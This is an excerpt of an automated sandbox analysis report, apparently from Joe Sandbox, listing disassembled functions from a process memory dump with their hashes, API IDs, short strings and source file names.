                                                                                  • Opcode ID: b09f744ba792c50c7e4b06a6d7ca342682bf18327ed14fea46daeb5009aad2d6
                                                                                  • Instruction ID: 06e4e0b19c85fb6ab97c055e9c0ee5fc02b86f5f103f8564535159e2d6b1e80b
                                                                                  • Opcode Fuzzy Hash: b09f744ba792c50c7e4b06a6d7ca342682bf18327ed14fea46daeb5009aad2d6
                                                                                  • Instruction Fuzzy Hash: CB41E331700202ABEB21DE25CC41F66B7A5FF54718F104619F996DB380DB61EC46DBE1
                                                                                  Function 02E22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                  • Instruction ID: d9f348a9c8a9347c422e72a830d998727055c2c7c320ead128cdb24db0b3afec
                                                                                  • Opcode Fuzzy Hash: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                  • Instruction Fuzzy Hash: 3C31B872A002299FDB20DE28CD50BEE77F8EF44714F445455ED4AE3200EB309A488F60
                                                                                  Function 02DB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: ed9ceeb4faa41433a514d93a05f7be91a880419cfd4d04cf4fb5a2b0caab7ae7
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: A3918372E00206DBEB26DE69C8A46FEF7A5AF88764F54451AE856EB3C0D7308D40CB54
                                                                                  Function 02D79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: de581275d6546365c7102e036a779ecf98b0a506814f6cae5fb3d1c214d7527f
                                                                                  • Instruction ID: 3b4acb65b6a823b55c8cab803fafbedd0fd99da0c9414505f16192106dc7d7cd
                                                                                  • Opcode Fuzzy Hash: de581275d6546365c7102e036a779ecf98b0a506814f6cae5fb3d1c214d7527f
                                                                                  • Instruction Fuzzy Hash: 31812C76D002699BDB31DB54CC54BEEB7B8AB08754F0041DAEA19B7350E7349E84CFA0